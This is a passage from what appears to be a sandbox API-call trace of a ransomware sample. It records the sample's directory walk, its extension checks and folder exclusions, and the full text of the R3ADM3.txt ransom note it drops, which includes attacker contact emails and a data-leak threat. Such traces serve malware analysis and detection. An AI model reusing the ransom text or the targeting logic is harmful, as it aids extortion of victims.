ftLastAccessTime.dwLowDateTime=0x5f0dcab0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5f0dcab0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0151.154] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0151.154] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5f0dcab0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5f0dcab0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.154] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0151.154] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0151.154] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSADDNDR.DLL", cAlternateFileName="")) returned 1 [0151.154] lstrcmpW (lpString1="MSADDNDR.DLL", lpString2=".") returned 1 [0151.154] lstrcmpW (lpString1="MSADDNDR.DLL", lpString2="..") returned 1 [0151.154] StrStrIW (lpFirst="MSADDNDR.DLL", lpSrch=".UAKXC") returned 0x0 [0151.154] StrStrIW (lpFirst="MSADDNDR.DLL", lpSrch=".exe") returned 0x0 [0151.154] StrStrIW (lpFirst="MSADDNDR.DLL", lpSrch=".dll") returned=".DLL" [0151.154] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0dcab0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5f0dcab0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5f0dcab0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0151.154] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0151.154] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0151.154] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0151.154] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0151.154] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0151.154] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0151.154] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0151.154] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0151.154] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0151.154] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0dcab0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5f0dcab0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5f0dcab0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0151.154] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c08 | out: hHeap=0xea0000) returned 1 [0151.154] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee66a0 | out: hHeap=0xea0000) returned 1 [0151.154] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0151.154] Sleep (dwMilliseconds=0x32) [0151.230] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec698 | out: hHeap=0xea0000) returned 1 [0151.230] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3658 | out: hHeap=0xea0000) returned 1 [0151.230] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec698 [0151.230] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.230] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeef2b0 [0151.230] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.230] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.230] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee66a0 [0151.230] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.230] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec630 [0151.230] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0151.230] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec630 | out: hHeap=0xea0000) returned 1 [0151.230] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.230] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee66a0 | out: hHeap=0xea0000) returned 1 [0151.230] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\R3ADM3.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0151.232] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0151.232] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0151.233] CloseHandle (hObject=0x6dc) returned 1 [0151.233] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.233] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.233] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f19b190, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5f19b190, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfb60 [0151.233] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0151.233] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f19b190, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5f19b190, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.233] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0151.233] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0151.234] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DW", cAlternateFileName="")) returned 1 [0151.234] lstrcmpW (lpString1="DW", lpString2=".") returned 1 [0151.234] lstrcmpW (lpString1="DW", lpString2="..") returned 1 [0151.234] StrStrIW (lpFirst="DW", lpSrch="tmp") returned 0x0 [0151.234] StrStrIW (lpFirst="DW", lpSrch="winnt") returned 0x0 [0151.234] StrStrIW (lpFirst="DW", lpSrch="temp") returned 0x0 [0151.234] StrStrIW (lpFirst="DW", lpSrch="thumb") returned 0x0 [0151.234] StrStrIW (lpFirst="DW", lpSrch="$Recycle.Bin") returned 0x0 [0151.234] StrStrIW (lpFirst="DW", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.234] StrStrIW (lpFirst="DW", lpSrch="System Volume Information") returned 0x0 [0151.234] StrStrIW (lpFirst="DW", lpSrch="Boot") returned 0x0 [0151.234] StrStrIW (lpFirst="DW", lpSrch="Windows") returned 0x0 [0151.234] StrStrIW (lpFirst="DW", lpSrch="Trend Micro") returned 0x0 [0151.234] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.234] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.234] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0151.234] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.234] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.234] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee66a0 [0151.234] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeef148 [0151.234] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.234] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EQUATION", cAlternateFileName="")) returned 1 [0151.234] lstrcmpW (lpString1="EQUATION", lpString2=".") returned 1 [0151.234] lstrcmpW (lpString1="EQUATION", lpString2="..") returned 1 [0151.235] StrStrIW (lpFirst="EQUATION", lpSrch="tmp") returned 0x0 [0151.235] StrStrIW (lpFirst="EQUATION", lpSrch="winnt") returned 0x0 [0151.235] StrStrIW (lpFirst="EQUATION", lpSrch="temp") returned 0x0 [0151.235] StrStrIW (lpFirst="EQUATION", lpSrch="thumb") returned 0x0 [0151.235] StrStrIW (lpFirst="EQUATION", lpSrch="$Recycle.Bin") returned 0x0 [0151.235] StrStrIW (lpFirst="EQUATION", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.235] StrStrIW (lpFirst="EQUATION", lpSrch="System Volume Information") returned 0x0 [0151.235] StrStrIW (lpFirst="EQUATION", lpSrch="Boot") returned 0x0 [0151.235] StrStrIW (lpFirst="EQUATION", lpSrch="Windows") returned 0x0 [0151.235] StrStrIW (lpFirst="EQUATION", lpSrch="Trend Micro") returned 0x0 [0151.235] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecba8 [0151.235] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.235] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.235] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0151.235] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.235] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.235] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecba8 | out: hHeap=0xea0000) returned 1 [0151.235] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecba8 [0151.235] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeef238 [0151.235] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.235] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EURO", cAlternateFileName="")) returned 1 [0151.235] lstrcmpW (lpString1="EURO", lpString2=".") returned 1 [0151.235] lstrcmpW (lpString1="EURO", lpString2="..") returned 1 [0151.235] StrStrIW (lpFirst="EURO", lpSrch="tmp") returned 0x0 [0151.235] StrStrIW (lpFirst="EURO", lpSrch="winnt") returned 0x0 [0151.236] StrStrIW (lpFirst="EURO", lpSrch="temp") returned 0x0 [0151.236] StrStrIW (lpFirst="EURO", lpSrch="thumb") returned 0x0 [0151.236] StrStrIW (lpFirst="EURO", lpSrch="$Recycle.Bin") returned 0x0 [0151.236] StrStrIW (lpFirst="EURO", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.236] StrStrIW (lpFirst="EURO", lpSrch="System Volume Information") returned 0x0 [0151.236] StrStrIW (lpFirst="EURO", lpSrch="Boot") returned 0x0 [0151.236] StrStrIW (lpFirst="EURO", lpSrch="Windows") returned 0x0 [0151.236] StrStrIW (lpFirst="EURO", lpSrch="Trend Micro") returned 0x0 [0151.236] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.236] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.236] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0151.236] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.236] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.236] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20cc8 [0151.236] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeee78 [0151.236] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.236] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Filters", cAlternateFileName="")) returned 1 [0151.236] lstrcmpW (lpString1="Filters", lpString2=".") returned 1 [0151.236] lstrcmpW (lpString1="Filters", lpString2="..") returned 1 [0151.236] StrStrIW (lpFirst="Filters", lpSrch="tmp") returned 0x0 [0151.236] StrStrIW (lpFirst="Filters", lpSrch="winnt") returned 0x0 [0151.236] StrStrIW (lpFirst="Filters", lpSrch="temp") returned 0x0 [0151.236] StrStrIW (lpFirst="Filters", lpSrch="thumb") returned 0x0 [0151.237] StrStrIW (lpFirst="Filters", lpSrch="$Recycle.Bin") returned 0x0 [0151.237] StrStrIW (lpFirst="Filters", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.237] StrStrIW (lpFirst="Filters", lpSrch="System Volume Information") returned 0x0 [0151.237] StrStrIW (lpFirst="Filters", lpSrch="Boot") returned 0x0 [0151.237] StrStrIW (lpFirst="Filters", lpSrch="Windows") returned 0x0 [0151.237] StrStrIW (lpFirst="Filters", lpSrch="Trend Micro") returned 0x0 [0151.237] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.237] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.237] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0151.237] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.237] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.237] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20cf0 [0151.237] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeef0 [0151.237] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.237] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GRPHFLT", cAlternateFileName="")) returned 1 [0151.237] lstrcmpW (lpString1="GRPHFLT", lpString2=".") returned 1 [0151.237] lstrcmpW (lpString1="GRPHFLT", lpString2="..") returned 1 [0151.237] StrStrIW (lpFirst="GRPHFLT", lpSrch="tmp") returned 0x0 [0151.237] StrStrIW (lpFirst="GRPHFLT", lpSrch="winnt") returned 0x0 [0151.237] StrStrIW (lpFirst="GRPHFLT", lpSrch="temp") returned 0x0 [0151.237] StrStrIW (lpFirst="GRPHFLT", lpSrch="thumb") returned 0x0 [0151.237] StrStrIW (lpFirst="GRPHFLT", lpSrch="$Recycle.Bin") returned 0x0 [0151.237] StrStrIW (lpFirst="GRPHFLT", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.237] StrStrIW (lpFirst="GRPHFLT", lpSrch="System Volume Information") returned 0x0 [0151.237] StrStrIW (lpFirst="GRPHFLT", lpSrch="Boot") returned 0x0 [0151.238] StrStrIW (lpFirst="GRPHFLT", lpSrch="Windows") returned 0x0 [0151.238] StrStrIW (lpFirst="GRPHFLT", lpSrch="Trend Micro") returned 0x0 [0151.238] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.238] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.238] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0151.238] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.238] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.238] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20d18 [0151.238] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeef058 [0151.238] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.238] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Help", cAlternateFileName="")) returned 1 [0151.238] lstrcmpW (lpString1="Help", lpString2=".") returned 1 [0151.238] lstrcmpW (lpString1="Help", lpString2="..") returned 1 [0151.238] StrStrIW (lpFirst="Help", lpSrch="tmp") returned 0x0 [0151.238] StrStrIW (lpFirst="Help", lpSrch="winnt") returned 0x0 [0151.238] StrStrIW (lpFirst="Help", lpSrch="temp") returned 0x0 [0151.238] StrStrIW (lpFirst="Help", lpSrch="thumb") returned 0x0 [0151.238] StrStrIW (lpFirst="Help", lpSrch="$Recycle.Bin") returned 0x0 [0151.238] StrStrIW (lpFirst="Help", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.238] StrStrIW (lpFirst="Help", lpSrch="System Volume Information") returned 0x0 [0151.238] StrStrIW (lpFirst="Help", lpSrch="Boot") returned 0x0 [0151.238] StrStrIW (lpFirst="Help", lpSrch="Windows") returned 0x0 [0151.238] StrStrIW (lpFirst="Help", lpSrch="Trend Micro") returned 0x0 [0151.238] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.239] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.239] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0151.239] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.239] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.239] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20d40 [0151.239] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeef1c0 [0151.239] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.239] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ink", cAlternateFileName="")) returned 1 [0151.239] lstrcmpW (lpString1="ink", lpString2=".") returned 1 [0151.239] lstrcmpW (lpString1="ink", lpString2="..") returned 1 [0151.239] StrStrIW (lpFirst="ink", lpSrch="tmp") returned 0x0 [0151.239] StrStrIW (lpFirst="ink", lpSrch="winnt") returned 0x0 [0151.239] StrStrIW (lpFirst="ink", lpSrch="temp") returned 0x0 [0151.239] StrStrIW (lpFirst="ink", lpSrch="thumb") returned 0x0 [0151.239] StrStrIW (lpFirst="ink", lpSrch="$Recycle.Bin") returned 0x0 [0151.239] StrStrIW (lpFirst="ink", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.239] StrStrIW (lpFirst="ink", lpSrch="System Volume Information") returned 0x0 [0151.239] StrStrIW (lpFirst="ink", lpSrch="Boot") returned 0x0 [0151.239] StrStrIW (lpFirst="ink", lpSrch="Windows") returned 0x0 [0151.239] StrStrIW (lpFirst="ink", lpSrch="Trend Micro") returned 0x0 [0151.239] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.239] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.239] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0151.239] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.240] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0151.240] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20d68 [0151.240] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeef0d0 [0151.240] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0151.240] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69dc9750, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSClientDataMgr", cAlternateFileName="MSCLIE~1")) returned 1 [0151.240] lstrcmpW (lpString1="MSClientDataMgr", lpString2=".") returned 1 [0151.240] lstrcmpW (lpString1="MSClientDataMgr", lpString2="..") returned 1 [0151.240] StrStrIW (lpFirst="MSClientDataMgr", lpSrch="tmp") returned 0x0 [0151.240] StrStrIW (lpFirst="MSClientDataMgr", lpSrch="winnt") returned 0x0 [0151.240] StrStrIW (lpFirst="MSClientDataMgr", lpSrch="temp") returned 0x0 [0151.240] StrStrIW (lpFirst="MSClientDataMgr", lpSrch="thumb") returned 0x0 [0151.240] StrStrIW (lpFirst="MSClientDataMgr", lpSrch="$Recycle.Bin") returned 0x0 [0151.240] StrStrIW (lpFirst="MSClientDataMgr", lpSrch="$RECYCLE.BIN") returned 0x0 [0151.240] StrStrIW (lpFirst="MSClientDataMgr", lpSrch="System Volume Information") returned 0x0 [0151.240] StrStrIW (lpFirst="MSClientDataMgr", lpSrch="Boot") returned 0x0 [0151.240] StrStrIW (lpFirst="MSClientDataMgr", lpSrch="Windows") returned 0x0 [0151.240] StrStrIW (lpFirst="MSClientDataMgr", lpSrch="Trend Micro") returned 0x0 [0151.240] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf20d90 [0151.240] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0151.240] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0151.240] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed4d8 [0151.240] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0151.240] HeapFree (in: 